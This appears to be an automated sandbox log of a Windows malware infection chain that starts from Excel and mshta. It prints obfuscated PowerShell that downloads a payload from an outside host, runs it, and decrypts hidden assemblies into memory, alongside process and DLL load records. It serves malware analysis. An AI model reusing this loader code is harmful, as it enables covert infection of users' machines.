Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp140.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Data Obfuscation

Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_036A75CF push cs; iretd 1_2_036A75D2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_036A759D push cs; iretd 1_2_036A75C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_036A7B7B push ss; iretd 1_2_036A7B8A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_02F212D8 push esp; retf 0002h 10_2_02F212E1

Hooking and other Techniques for Hiding and Protection

Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 7287
Source: unknownNetwork traffic detected: HTTP traffic on port 7287 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 7287
Source: unknownNetwork traffic detected: HTTP traffic on port 7287 -> 49731
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
